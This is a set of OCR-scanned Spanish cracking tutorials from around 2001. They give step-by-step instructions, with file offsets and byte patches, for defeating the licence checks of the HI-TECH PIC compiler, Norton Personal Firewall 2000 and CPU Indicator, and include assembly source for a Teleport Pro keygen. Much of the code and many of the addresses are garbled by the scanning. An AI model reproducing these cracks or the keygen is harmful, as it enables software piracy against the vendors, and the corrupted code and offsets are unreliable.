IDC_SERIAL EQU 1002 
IDC_GEN EQU 1003 
IDC_EXIT EQU 1004 


DlgFunc PROTO :DWORD, :DWORD, : DWORD, : DWORD 
Operacion PROTO 


.data 

nombre db 80 dup(0),0 

serial db 10 dup(0),0 

largo db 02 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 

Iconimage db "keygen",0 
minombre db "Caos reptante",0 
menosde5 db "¡Mínimo 5 caracteres!",0 
hInstance dd 0 

hIcon dd 0 

hWnd da 0 


. code 

start:invoke GetModuleHandle, NULL 
mov hInstance,eax 
invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, 1]Param: DWORD 


cet 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 


invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlgltemText,hDlg,IDC_NAME, ADDR minombre 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDl1g,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICK 
.1f ax==IDC_! 


D 


E 
¡al 
= 
¡al 


invoke SendMessage,hDlg,WM_CLOS 


.elseif ax==IDC_GEN 


p 


, 


0,0 


invoke GetDlglItemText,hDlg, IDC_NAME,ADDR 


invoke lstrlen,ADDR nombre 
mov edx,offíset largo 

mov dword ptr [edx],eax 
invoke Operacion 

.1f eax== 


nombre, 80 


invoke SetDlgltemText,hDlg,IDC_NAME, ADDR nada 
invoke SetDlglItemText,hDlg,IDC_SERIA 


.else 


,¡, ADDR menosde5 


invoke SetDlgltemText,hDlg, IDC_SERIA 
invoke SetDlgltemText,hDl1lg,IDC_NAME,ADDR nombre 


.endif 
ret 
.endif 
.endif 


.endif 


DlgFunc endp 


Operacion proc 


bucle: 


sigue: 


hexadec: 


espacios: 


mov edi,offset nombre 
invoke lstrlen, offset nombre 
.1f eax< 5 
mov eax,1l 
ret 
.endif 
add eax,-4 
xor ebx,ebx 
mov edx, DDFEE4A4h 
cmp ebx,eax 
jnb hexadec 
xor edx,dword ptr[editebx] 
test b1,40h 
je sigue 
inc ebx 
inc ebx 
jmp bucle 


mov esi, offset serial 
xor eax,eax 
mov byte ptr[esil,32 
.1f eax < 11 

inc eax 

inc esi 

jmp espacios 
.endif 
mov eax,edi 
dec esi 
mov eax, edx 
mov ecx,10 


,, ADDR serial 


otro: cmp eax,ecx 
jb fin 
xor edx,edx 
div ecx 
or dl,30h 
mov byte ptr[esi],dl 
dec esi 
jmp otro 
Lima or al,30h 
mov byte ptr[esil,al 
xor eax,eax 
ret 


Operacion endp 
end start 


El procedimiento DlgFunc es la base del programa y se ocupa de: 

1”- Condiciones iniciales (WM_INITDIALOG;: define el icono del programa y pone un nombre ("Caos reptante”) 
por defecto. 

2”- Comprueba si se ha cerrado el programa desde la barra superior (WM_CLOSE) 

3”- Comprueba si se ha pulsado un botón (WM_COMMAND - BN_CLICKED). Si ha sido el de Terminar 
(IDC_EXIT), pues eso, sale. Y si ha sido el de Generar ( IDC_GEN), comprueba la longitud del nombre, y ejecuta el 
procedimiento Operacion. Al terminar éste, si la longitud del nombre es igual o superior a cinco, nos escribe el serial 
correspondiente al nombre. 


El procedimiento Operacion calcula el número válido y llama a la subrutina hexadec que se ocupa de poner espacios 
en la casilla del serial number (para borrar un número que hubiéramos obtenido anteriormente, ya que si fuera más 
largo, el número resultante sería la superposición de ambos) y pasa el serial number obtenido, de hexadecimal a 
decimal, tras lo cual, vuelve al procedimiento principal. 


De hecho, si hacéis los dos archivos como los he hecho yo, y los compiláis, veréis que el programa resultante 
funciona correctamente. Pero como la programación en Assembler no es lo mío, estoy seguro de que alguien que 
sepa programar verá muchos defectos, que le agradecería me hiciera saber. 


Conclusión... 


¡¡Hemos conseguido que los dos keygens den el mismo resultado!! 


¿ Teleport Pro 1.23. ' Teleport Pro 1.23. 
A Tel Pro 1.29.1590 MIE Tel Pro 1.29.1590 MEE 
Nombre | Caos reptante Nombre Caos reptante 


Serial 1725877161 
Terminar | 


Debo mencionar que para hacer el programa en ASM me he documentado en trabajos de JoTaKe, el cual a su vez, se 
había basado en trabajos de MrCrimson. Así pues, mi reconocimiento para ambos. 


Serial 


Finalmente, tengo que recordaros que la finalidad de estos tutoriales no es la de permitir ahorrarse unas pesetillas 
(bueno... realmente no son unas pesetillas, son nada menos que 40 $), sino la de que nuestras neuronas hagan 
gimnasia, y que si queremos utilizar el programa habitualmente, debemos pagar con la sonrisa en los labios y el 
llanto en el corazón :“o( 


Ya sólo me queda saludar a los que habéis tenido la paciencia de llegar hasta aquí y despedirme hasta el próximo 
tutorial, si es que llega... 


Si queréis hacerme llegar alguna duda, sugerencia, elogio, crítica o corrección, mi dirección de e-mail es: 
caos_reptante hotmail.com 
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Programa: HI-TECH V7.85 

PROTECCION: Serial 

Objetivos ge SaE fruta en el key, y que los pobres disfrutemos del 
compilador. 

Descripcion: Compilador de C para todos los micros PIC. 

Dificultad: Novato. 

DOWNLOAD : http: //ww.hitech.com 

Herramientas: Softice, IDAPRO, HexWorshop 

CRACKER: Aftosa FECHA: 17/03/2001 


INTRODUCCION 


Este compilador de C de Hi-Tech, es el hermano mayor del famoso y de libre distribucion PIC-LITE. Es una 
versión que sólo soporta los procesadores PIC 16C87 y similares. 


Como exponente mayor permite programar todas las versiones de procesadores de la familia PIC, pero tiene 
el inconveniente que no es free. Lógicamente el costo de esta herramienta es muy accesible para empresas, 


pero no así para estudiantes y derivados. 


Es un programa de DOS, y usa como mecanismo de protección el pedido de una password que figura en la 
caja del CD cuando se lo compra. 


AL ATAKE 


Si se ejecuta el programa, después de algunos enter, aparece la pantalla en la que se piden el serial key y demás. 


Please enter the following information 
User name TO 


Company name 


Your serial number and installation key can be 


found on the reverse of the user manual title page 
Serial number 


Installation key 


Si completamos los datos y presionamos enter, aparece una pantalla donde se nos informa que no estamos autorizados a instalar 
este compilador, su aspecto es el siguiente: 


Invalid serial number or installation key 


Al llegar aquí se terminan las ilusiones de tener un copilador para C como la gente, para poder hacer proyectos con PIC. En este 
momento es cuando uno piensa como puedo hacer para instalarlo?, Uno ha escuchado sobre personas que la tienen atada, y que 
es un juego de chicos, pero lamentable (hasta ahora) no conocía a ninguno. Un dia en el lugar donde trabajo, una persona a la 
que le gusta Annibal Lexter me comento que estaba trabajando con herramientas de crack, mencionandome al Guru Karpoff, al 
SICE, y demas yerbas. Quede acelerado pensando que esta era la manera de ver cómo podía hacer que el cartel de "invalid serial 
number" fuera un mal sueño. 


Bueno después de esta introducción una manera novelesca, y sin dejar de agradecer a la gente que me ayudo , paso a explicar 
cómo hice para que la pantalla no apareciera más. 


Primero hay que desZipear el archivo pic785.exe en cualquier directorio de la PC, esto es porque como es autoejecutable, si se 
lo ejecuta se autoinstala, y no nos da la posibilidad de tener el archivo install.exe. para estudiarlo. 


Como aprendí de los tutoriales de Karpoff, abro install.exe con el Ida, (en este caso conviene porque es de DOS), y busco con el 
search text la palabra "Invalid" que es la que aparece en la pantalla que informa que no se puede instalar. Cabe aclarar que hay 
otra manera de buscar este String: es ir a Name en View y en listado buscar la etiqueta que sea mas parecida al string buscado; 


non 


por supuesto es conveniente que empiece con "a". 


De todos modos las dos maneras llevan al mismo lugar. 


File Edit Jump Search View Options Windows Help 
alu el-/ sel081""] <] 1x] =(+) 
q v[ av] 5] M] Kf + 7 


IDA View-A | 


"Enter activation key',0 
"Enter serial number and activation key',0 


"Please enter correct serial no. and installation k; 
"Installation key' ,0 


"Drive not ready',0 
"This package has already been installed by',0 


Esta ventana nos muestra el string que aparece en la pantalla en cuestión, más un data XREF a seg007:1056, si hacemos doble 
click en este solamente nos lleva al punto donde se define el mensaje en assembler. Como nosotros buscamos el código que 
llama a este puntero, la manera que encontré es buscar "1056" como string, (uso solamente 1056 porque estamos en DOS, donde 
no exite la memoria extendida), estó nos lleva al punto culminante de la cacería. 


5289h 


5349h 


La línea señalada corresponde al puntero de string de invalid Key. En este punto levantado la vista y llegando hasta el "jnz", nos 
damos cuenta que después de llamar a dos funciones se hace una comparación: si no da cero, se considera que el código 
ingresado es válido, si no se presenta el mesaje de inavlid key. 


Es fácil darse cuenta que hay que cambiar el salto condicional, para que salte si es cero. Como soy un principiante voy a detallar 
un modo que encontré en tutoriales para hacer esto. Las dos cosas que se necesitan para usar el hexWorshop, (que es la 
herramienta que se usa para editar el ejecutable), son la direccion del archivo donde está el salto y el hexadecimal que 
corresponde al asm jzn y jz. La dirección aparece en la barra de estado del IDA, (en el cuarto casillero desde la izquierda). El 
código se puede obtener a partir de tablas de referencia de asm, o también usar una utilidad del IDA muy potente, que se llama 
assemble y que está en el menú patch program dentro de edit. 


5289h 


seg001 : 2D05 


Assemble instruction xl 


Previous line: 
Address  :0x1079:0x2D05 


Instruction hz loc_79_2D3B| | 


Cancel | Help | 


Como se puede ver cambiamos el jnz a jz, y mantenemos la etiqueta del salto. Presionando enter aparece el código jz en vez de 
jnz. Pero todavía nos falta saber cuál es el hexadecimal del jz: para esto usamos dentro del menú patch program el menú edit 
byte, que muestra el código de la siguiente manera: 


5289h 


seg001 : 2D05 


Patch Bytes o x 


File offset : 0x8625 
Original value: 75 34 FF 36 28 2C B8 04 001€ B9 4953 51 94 0C 
Walues [73 34 FF 36 28 20 B8 04 001E B9 495351 94 0C y] 


Cancel | Help | 


Vemos que el 75 que corresponde al jnz ahora cambió al 74 que corresponde al jz. Solo resta ir al hexworshop y cambiarlos. 


Dentro del hex abrimos el archivo, y vamos al menú goto dentro de edit, donde cargamos el valor 8625 en hexadecimal. 
Presionamos enter y aparece la siguiente pantalla: 


ÍH Hex Workshop - [install.exe] 3 
[ Fle Edit Disk Options Tools Window Help 


EA A CANTE 100 60 /a|) 


Y | E 


[5 -«»S2 52 1 Ejn+-.7x mes 


00008624 34FF 20B8B 519A 900|.M4.6(., 
00008638 5810 5610 0404 2CFF |.6X..6V 
0000864€C JUEF 1094 FEJE ¡391 65... 62 


En la izquierda se indica la posición del offset. Seleccionado el byte en cuestión y haciendo click con el botón derecho aparece el 
pop-up, vamos a fill llenamos con 74 y presionamos enter: 


File Edit Disk Options Tools Wind Ow Help 
[ss l¿Beo|peyia [muss 10 
[5 


“ASP Al E A+ - ./ 2 [eo e e 


5 
1 


C Hex 


Number of bytes: [ 


( Dec 


Cancel | 
[7] 


Fill with the following hex byte: 


Fills the Current Selection 


Sólo nos resta salvar el archivo y listo. Ahora, al correr el install.exe aparece la siguiente pantalla de instalacion, que nos 
confirma que el serial number ahora no se tiene en cuenta. 


Installing HI-TECH C (Microchip PIC) Cross Compiler U7.85 


22% completed 


Don't forget to complete and post the registration card. 
If you didn't receive a registration card, contact HI-TECH 
or your supplier. You must register to get technical support 
and updates. 


La información suministrada aquí es solamente con propositos educativos. Si usted usa este soft con fines comerciales, por favor 
compre el compilador original a hi-tek. 
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Programa: Norton Personal Firewall 2000 


PROTECCION: Limitacion de Tiempo y Nag 
Muy buen y práctico Firewall para internet 


DOWNLOAD : ASA TE nES no sé, ya que lo he conseguido en un CD de Shareware. Pero se debe 
poder bajar de www.Norton.com 
Herramientas: — [sotrico, IDA , Editor Hexadecimal 


INTRODUCCION 


Crackeando Norton Personal Firewall 2000. Por Sorvats 


Hola, como les va crackers. Hoy elegiremos como víctima una de las 
herramientas más útiles para el web-surfer cuidadoso de hoy en día. Un 
firewall, y qué firewall... el de Norton. Al parecer, esta compañía, 
que empezó con antivirus, y aún con el mismo Norton commander, se ha 
empezado a interesar en la seguridad informática. 


Bueno dejémonos de cháchara y comencemos... 


Lo que me ineteresa de este tutorial es una protección comercial muy 
especial, usada por varias compañías de software en la red, para la 
distribución de sus programas shareware. Se llama Virtual Box, o más 


comúnmente llamada VBox. 


Lo que sabemos de esta protección es que tiene una protección de 
tiempo, por un chequeo desconocido (que lo hace bastante difícil), y 


una rutina antiSice, basada en SEH). 
Esto nos hará dibyujar un plan de ataque al programita, para ver que 


Carajo hace. Esto es lo que se me ocurrió a mí: 


1- Darle disassembly con IDA(porque encuentra todas las llamadas a 


funciones en DLLs, aún las que no están en el directorio del sistema). 


2- Correr el programa para ver que esté la rutina antiSice (porque 
esto lo decide el programador, y a veces no le ponen). Y de paso ver 


que structura tiene la llamada a la Nag screen 


3- Una vez comprobado todo lo anterior, procedemos a deshacernos dela 
NAG y de la protección, para hacer que el programa funcione como Dios 
manda. 


DISCLAMER 


e Cabe aclarar que toda la información incluída en este texto se 
aferra a su total objetivo educacional, debido a esto, el autor no 
puede hacerse cargo de los fines con que sea usada esta 
información. 


AL ATAKE 


LUZ Bueno ahora procedamos al punto 1, desensamblemos el archivo base de la aplicación, en 


este caso IAMAPP.exe. Parece que los programadores nos hubieran querido decir a nosotros los 
crackers donde empezar a buscar, porque todos los archivoz empiezan con lam y luego la 
descripción de que tiene adentro. Una vez desensamblado, ejecutemos el programa con Softice 
habilitado. Oh dios!!!! 

La nag aparece sin ningún problema!!!! 

¿Que clase estúpido pondría una VBox en su programa sin la rutina anti debugger? Después de 
esto, lo único que nos falta suponer que el archivo base no está empacado, y esta sesión de 
cracking se convertirá en un simple parche.... 


CAMARA Miremos al listado muerto de nuestro programa y que quieren que les diga... A mi 
parece bastante coherente el código, con llamadas a APIs y todo, un punto deentrada con la 
estructura más común... 

Hay que afirmar que el que protegió esto es un idiota, así, el VBox para lo único que 
sirve es para mostrarnos la fecha en que vencerá nuestro período de trial, y luego hará que 
el programa se termine... 


ACCION 


Así que pasemos al paso 3, la acción!!! 
Veamos, Cambiemos la fecha de nuestro computador para que sobrepase el tiempo de prueba. 
Luego iniciemos NPF y miremos a la NAG que nos muestra nuestro amigo. "Trial expired", y el 
botón de "Probar el programa" está deshabilitado. así quen hay dos opciones aquí, hacemos que 
la nag se vaya a la mierda y no aparezca más, o hacemos que el botón se habilite. Desde mi 
punto de vista, algún día voy a intentar la segunda, por causas de curiosidad, nunca he 
estado traceando dentro de una dll de Virtual Box, y me gustaría. Pero es este un tutorial 
para newbies y no quiero complicarles la existencia. Vamos a ver de donde carajo se llama a 
la DLL de VBox y eliminar esa llamada. Corremos el programa y ponemos "bpx DialogBoxParamaA" 
en Softlce. Luego apretamos el botón 'ENABLE', y estamos dentro de Softlce. En la función 
GetDialogBoxParamA. apretamos F12 para salir de la función, y como veremos aparece la NAG. 
Como solo podemos apretar el botón 'Quit' para salir, lo hacemos y nuevamente estamos en 


SoftlIce. Esta es la pantalla: 


PROT32 


015F:00442FAB FF1564F24900 CALL [USER32 !DialogBoxParamA] 
015F:00442FB1 8BFO MOV ESI,EAX 


015F:00442FB3 E8CDO10000 CALL 00443185 
015F:00442FB8 56 PUSH ESI 

015F:00442FB9 E80C000000 CALL 00442FCA 
015F:00442FBE 8325F0D34A0000 AND DWORD PTR [004AD3F0],00 
015F:00442FC5 59 POP ECX 

015F:00442FC6  5F POP EDI 

015F:00442FC7  5E POP ESI 

015F:00442FC8 5B POP EBX 

015F:00442FC9 C3 RET 

015F:00442FCA 837C2404FF CMP DWORD PTR [ESP+04],-01 
015F:00442FCF 7414 JZ 00442FE5 
015F:00442FD1 8370240401 CMP DWORD PTR [ESP+04],01 
015F:00442FD6 “7409 JZ 00442FE1 
015F:00442FD8 A1FO0D34A00 MOV EAX, [004AD3F0] 
015F:00442FDD FF502C CALL [EAX+2C] 
015F:00442FE0 C3 RET 

015F:00442FE1  6A09 PUSH 09 

015F:00442FE3 58 POP EAX 

015F:00442FE4 C3 RET 

015F:00442FE5 E804000000 CALL 00442FEE 
015F:00442FEA 6A04 PUSH 04 

015F:00442FEC 58 POP EAX 

015F:00442FED C3 RET 

015F:00442FEE B888B94900 MOV EAX,0049B988 
015F:00442FF3 E88CA00400 CALL 0048D084 


VBOXS430!PREVIEW+1FAB 


Veremos que estamos dentro de VBOXS430.dl1. Entonces, lo que vamos a hacer es apretar F12 
hasta que veamos salimos de ella, y miramos en donde estamos. Esto es algo parecido a tracear 
hacia atrás, ya que por cada vez que apretamos F12, estamos saiendo de una función. Así que 
después de un par de veces de seguir cayendo en el mismo lugar, vemos que estamos en otro 
lado... Esta vez abajo dice N32USERL, podemos sopechar que es un dll, o un ejecutables, así 
que lo que haremos será buscar el archivo de nombre n32userl, lo encuentra como n32userl.dll, 
en el mismo directorio que jamapp.exe. Lo qu yo hice, para poder identificar el código, es 
cargar todas las funciones exportadas por estas dos dlls con el Softice Symbol loader. Así 


podría ver que funciones se llaman en el ejecutable y en el n32userl.dl1l 


Luego, hacemos lo mismo que hicimos antes, solo que ahora veremos los nombres reales de las 
funciones que se llaman, a excepción de los dela VBOXS430.DLL, que está empacada y los 


nombres aparecen en forma de números ordinales, como por ejemplo ORDO002. 


Una vez que hicimos todo lo que debimos, deberíamos estar en la pantalla del Sice que nos 


muestra lo siguiente: 


N32USERL!N32User_GetUserState+002D PROT32 
015F:0043117D  E8DA000000 CALL vboxs430!0RD_0002 
015F:00431182 85C0 TEST EAX, EAX 
015F:00431184 7558 JNZ 004311DE 
015F:00431186 8B442404 MOV EAX, [ESP+04] 
015F:0043118A 3D147D0000 CMP EAX, 00007D14 
015F:0043118F 740E JZ 0043119F 
015F:00431191  3DC0C40000 CMP EAX, 0000C4C0 
015F:00431196 7407 JZ 0043119F 
015F:00431198 3D58E50000 CMP EAX, 0000E558 
015F:0043119D 7509 JNZ 004311A8 
015F:0043119F  E8B2000000 CALL vboxs430!0RD_0004 
015F:004311A4 8B442404 MOV EAX, [ESP+04] 
015F:004311A8 3D147D0000 CMP EAX, 00007D14 


015F:004311AD 741D JZ 004311cc 
015F:004311AF  3DC0C40000 CMP EAX, 0000C4C0 
015F:004311B4 7416 JZ 004311cc 
015F:004311B6 8B942414010000 MOV EDX, [ESP+00000114] 
015F:004311BD 33C9 XOR ECX, ECX 
015F:004311BF  3D58E50000 CMP EAX,0000E558 
015F:004311C4 0F94C1 SETZ CL 

015F:004311C7 41 INC ECX 

015F:004311C8  890A MOV [EDX] ,ECX 
015F:004311CA EBOD JMP 004311D9 
015F:004311CC”— 8B842414010000 MOV EAX, [ESP+00000114] 
015F:004311D3 C70000000000 MOV DWORD PTR [EAX],00000000 
015F:004311D9 BE01000000 MOV ESI,00000001 
015F:004311DE E86D000000 CALL vboxs430!0RD_0005 


N32USERL! .text+017D 


Como podremos ver, ahora el texto verde de arriba nos indica en que función de N32USERL.DLL 
estamos. entonces, ahora deberemos apretar F12 nuevamente para ver desde donde llamaron a 


esta funcioncita dentro del dll. 


Apretamos Y..... ALELUYA!!!!!! 
Allí está, ahí lo vemos, el nombre de nuestro ejecutable, esta es la raíz de todo, así que 


aquí será donde parcharemos el programa... 
fijense en cualquiera de las direcciones que vean y búsquenlas en IDA, porque ya me estoy 


hartando de entrar al Sice para sacar las pantallitas... 


este es el código, extraído del IDA: 


push eax 

Call 3j_N32User_GetUserState 

cmp [ebp+var_4], esi 

jnz short loc_405DB0<-- Este salto es el que nos caga 

mov eax, [ebp+arg_0] 

mov [eax], esi 

mov eax, [ebp+arg_4] 

and dword ptr [eax], 0 

jmp short loc_405DD1<--Con este JMP nos vamos de la función 
loc_405DBO0: 

xXOor eax, eax 

cmp [ebp+var_4], eax 

jnz short loc_405DC7 

mov eax, [ebp+arg_0] 

mov [eax], esi 

mov eax, [ebp+arg_4] 

mov dword ptr [eax], 1Eh 

jmp short loc_405DD1 
loc_405DC7: 

mov ecx, [ebp+arg_0] 

mov [ecx], eax 

mov ecx, [ebp+arg_4] 

mov [ecx], eax 


loc_405DD1: 


pop esi 
leave 


retn 


sub_405D7B endp 


veremos que hay un par de saltos que dependen de lo que la función returne, así que lo que 
vaqmos a hacer es ver a donde va a parar cuando ya se nos acabó el tiempo, podemosw ver que 
lo que hace la función cuando no estamos registrados es retornar un valor de [ebp+04] igual a 
ESI, lo que nos lleva a que el JNZ que está consecutivo no se ejecute, y directamente llegue 
al jmp y se vaya de la función. Así que lo que haremos es obligarlo a saltar en esa 
dirección. Para esto, en un editor hexadecimal, yo utilizo HIEW para ver el código o 
HexWorkshop para editar datos, iremos al offset que IDA nos diga que esta dirección es, en 
este Caso, el JNZ está en el offset 00005DA1l, así que vayamos a ese offset en el eitor y 


cambiemos el 75 por EB esto es, estamos cambiando un JNZ por un JMP. 
Después cerremos el editor y guardemos los cambios, luego ejecutemos el programa yt veamos. 


Apretemos el botón 'Enable' y veamos.... 
Aparece la Nag, apretamos 'Quit' y..... 


Sí!!! El programa se habilita y aparece en el Systray 

Ahora, lo que tenemos que hacer es eliminar la NAG del camino, ya que a pesar de que hemos 

hecho que se habilitara el progrrama, la NAG sigue siendo un obstáculo para nuestro trabajo. 
Para hacer esdto, lo que haremos es transformar la sección de código que llama a la función 

en el dll en NOPs, cuyo valor hexadecimal en el archivo es 90, así que transformaremos desde 
el offset 00005D98 al 00005DAO0 en nops, es decir, convertiremos cada byte dentro de ese 


rango en uno que tenga el valor 90h. 


00405D98 push eax 
00405D99 call j_N32User_GetUserState 
00405D9E cmp [ebp+var_4], esi 


Este será el código que transformaremos en NOPs, debemos eliminar el push eax para que la 
pila quede estable, y el cmp [ebp+04] para que también queden estables la banderas 


Una vex que hacemos esto, guardamos los cambios y probamos el programa, apretamos el botón 
para habilitarlo y ...,BINGO!!!! 

la nag ya no aparece y el programa se habilita, no hay rastros de una Virtual Box en nuestro 
programilla... 


Hemos crackeado el Norton Personal Firewall 2000 


ADIÓS Y MUCHAS GRACIAS POR TOMARSE EL TIEMPO PARA LEER ESTE TUTORIAL. Si quieren mandar 
alguna sugerencia, consejos, erratas, preguntas, dudas, o agradecimiento, por favor háganlo 


a: 


oktogen (at) phreaker (dot) net 


[Solo reemplazen (at) por una Q y (dot) por un punto] 


Adios, hasta la próxima. 


Me hago llamar Sorvats. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 


CPU Indicator 1.2 


KuaTo_ThoR 
INTRODUCCION 


Un Saludo a Todos amigos. En un principio este tutorial era para la compañías PY Software, para todos sus 
programas, pero salvo este el resto se basan en códigos de registro, muy fáciles de conseguir. Por tanto, nos 
centraremos en este programa CPU Indicator, que tiene una protección comercial que nunca había visto, y que es 
bastante curiosa. Aunque como podremos ver no es nada del otro mundo. 


En la web www.soft-trade.com , creo que podéis encontrar más programas con esta protección, para los que 
quieran practicar un poco más ;-) 


AL ATAKE 


PROTECCIÓN VTCyberPack 


El programa la verdad es que tampoco es de mucha utilidad, creo yo, por eso me sorprendio que llevase una protección 
comercial. 


Ejecutamos el programa y nos aparece la siguiente ventana: 


Soft-Trade 


Try.Rent.Buy. 


Welcome to Soft-Trade! 


Soft-Trade is focused on giving customers | more options when it 2 
comes to buying software. With our unique service, you can soft-trade 


try, rent, and buy y your favorite applications on the Internet... 
All from a single source. 


To activate this application for y our use, simply click on the 


Try, Rent, or Buy buttons to the right. We will then take you through 
the easy process of "unlocking" this program. 


Soft-Trade .com 


Todas las opciones de compra, alquiler y demás, son a partir de internet, no hay por donde meterle el código, mmm... El trial 
es de sólo cinco dias. Yo ya llevo dos, jejeje. Si damos al botón rectangular que pone soft-trade, veremos que aparece: 


About this package 


' YTCyberPak 2.4.2.4 
r Copyright € 1998-2000 ViaTech Inc. 


soft-trade” This Try-and-Buy Media package has been 
prepared by Xilicon, Inc. using eLicense System (TM) technology 
from WiaTech, Inc. 


Package presentation and eLicense System are 
Copyright (ce) 1998-2000 ViaTech, Inc. All rights reserved. 


For more information, visit our web site by clicking on the link below. 


Esta es la protección. | nteresante. No sé vosotros, pero yo desde el primer momento que la vi, me recordo a la protección 
vbox, y de esa forma la vamos a tratar. 


He visitado la web de Via Tech, www.elicense.com , existe una versión de prueba de la protección. La descargué y se la puse 
a un programa que ocupaba 1.3 MB, después de pasarle la protección, ocupaba 2 MB. Por tanto podemos deducir que quién 
usa esta protección no busca reducir espacio, sino proteger el programa, lo cuál como veremos a continuación no lo consigue 
:) 


Creo que la protección es fácilmente reconocible, ya que nos lo dice, pero voy a decir por encima alguna de las caraterísticas 
que he visto de esta protección. Lo primero, es que en el directorio del programa, podemos encontrar una dll, vtcpak24.dll, 
el 24, será por la versión supongo. Que si analizamos con File ImsPEctor, veremos que está empakada con Aspack (si os 
interesa, podéis utilizar Unaspack para desempaketarla). Además en tiempo de ejecución el programa crea otro archivo, s3vv-| 
---.2XCp, en los guiones aparecen numeros y letras de forma más o menos aleatoria, que curiosamente, también está 
empakado con Aspack. Este archivo tiene algo que ver con el estado de la licencia del producto. El funcionamiento básico, 
consiste en que el archivo principal, llama a vtpack24, y esta a su vez al archivo temporal, que es el que saca la ventana, 
luego vuelve a vtpack24 que a su vez devuelve al control al programa principal, una vez desempakado. 


AL ATAKE 


Bueno, ahora sí, vamos a por él. Ejecutamos el programa, nos aparece la ventana de antes, podemos hacer dos cosas, utilizar 
los handles de windows para meternos en el código, o podemos simplemente ir a Sice (Ct +D) y poner bpx 
getprocaddress, que es lo que haremos porque es más rápido, volvemos al programa (F5) y pulsamos Try. Aparecemos en 
Sice, desactivamos el breakpoint (bd*), y pulsamos F12 hasta que aparezcamos en algo que pueda parecerse a uno de los 
archivos anteriores. Apareceremos en s3vv----, pero lo que queremos es encontrar el lugar donde vamos al programa, una 
vez desempaketado, por tanto debemos llegar a vtpack24, para ello pulsamos F12 hasta que lleguemos allí. Aparecemos 
aquí: 


* Reference To: KERNEL32.LoadLibraryA, Ord:0190h 


| 

:024833F1 FF1584F04802 Call dword ptr [0248F084] <- La llamada al archivo temporal del que procedemos. 
:024833F7 8985D4F2FFFF mov dword ptr [ebp+FFFFF2D4], eax <- Aqui aparecemos. 

:024833FD 8B85D4F2FFFF mov eax, dword ptr [ebp+FFFFF2D4] 

:02483403 50 push eax 

:02483404 FF1560F04802 Call dword ptr [0248F060] 

:0248340A 8D8D18F4FFFF lea ecx, dword ptr [ebp+FFFFF418] 

:02483410 51 push ecx 

:02483411 E8800E0000 Call 02484296 


:02483416 83C404 add esp, 00000004 
:02483419 83BDD4F2FFFFOO cmp dword ptr [ebp+FFFFF2D4], 00000000 
:02483420 7505 j¡ne 02483427 


:02483427 833D3417490201 cmp dword ptr [024917341], 00000001 
:0248342E 751D ¡ne 0248344D 


:0248344D 5E pop esi 

:0248344E 5D pop ebp 

:0248344F 5B pop ebx 

:02483450 8BE5 mov esp, ebp 

:02483452 5D pop ebp 

:02483453 FF2544174902 jmp dword ptr [02491744] <- Saltamos al programa principal, este es nuestro "Program Entry 
Point'. Anotamos su valor que es 4509F8. (que coincide con el del programa original, así que nos da igual) 


Aqui está todo el código necesario. Bueno, desde donde aparecemos vamos pulsando F1O hasta llegar a 02483453, que es 
desde donde vamos al programa en sí, una vez desmpaketado. Una vez en esa dirección, creamos un bucle infinito, para 
dejar volcado el programa en memoria, para ello, vamos a meter código asm con Sice, con el comando a. Escribimos a eip, y 
nos aparecerá :02483453 en la línea de comando, metemos jmp eip y pulsamos enter un par de veces. Pulsamos F5, y se 
quedo el programa volcado en la memoria, esperando a que nosotros lo recojamos con las redes de procdump. 


Pues eso, abrimos Procdump, y en la ventana de tareas activas, selecionamos con el botón secundario del ratón nuestro 
programa, cpu_ind_r, y en el menú emergente seleccionamos dump (full). nos pedirá el nombre del nuevo ejecutable y ya 
está. Cerramos el programa que hemos dejado en la memoria, seleccionando en el menú anterior Kill Task. 


Probamos el programa y ... ¿qué es esto? ¿qué pasa? Nos aparece lo siguiente: 


Error al iniciar el programa 


7 


Lo que ha pasado, es que nuestra tabla de importaciones está mal. Para solucionar el problema, volvemos a repetir todo el 
proceso, hasta el momento en el que usamos procdump. (ahora sabéis porque dije bd y no bc ;) ) 


Abrimos Procdump, y lo primero de todo vamos a las opciones, y seleccionamos Rebuilt New | mpot Table, una vez 
seleccionado hacemos lo mismo de antes. Lo probamos y ... ¡¡¡ PERFECTO !!! Fuera protección, y puesto que el programa no 
lleva ninguna más, hemos terminado. 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. Espero que os haya resultado útil este tuto. No olvidéis que nuestro objetivo sólo es 
aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. [KRaVIiTZ], 
vuelve pronto ;-) 


Hasta la próxima... 
«>» —==*ze=-« » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« >») —o==*zeo-« » 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: — e-motional Greeting Card Creator v1.01 


PROTECCION: Serial. 

Objetivo: Conseguir un número de serie válido 

Descripcion: Programa para crear tarjetas de saludos. 

Dificultad: Newbie 

DOWNLOAD: http: //www.e- motional.com 

Herramientas: W32Dasm, file insPEctor, Softl CE, eXeScope 

CRACKER: ACT_Mago FECHA: 20/02/2001 

INTRODUCCION 

Tutorial N“20 


Hola amigos, presento mi vigésimo tutorial. Ya saben, si tienen alguna duda sólo pregúntenlo 

actmagoO' hotmail.com , y como siempre digo...sólo preguntas referentes a este tutorial y no pedidos u otras cosas. 
En este tutorial usaremos el Softl CE y el W32Dasm. Si no los tienes instalados puedes bajártelos en 
www.crackstore.com . Asumo que tienes conocimientos básicos sobre como usarlos. Y para terminar con la INTRO 


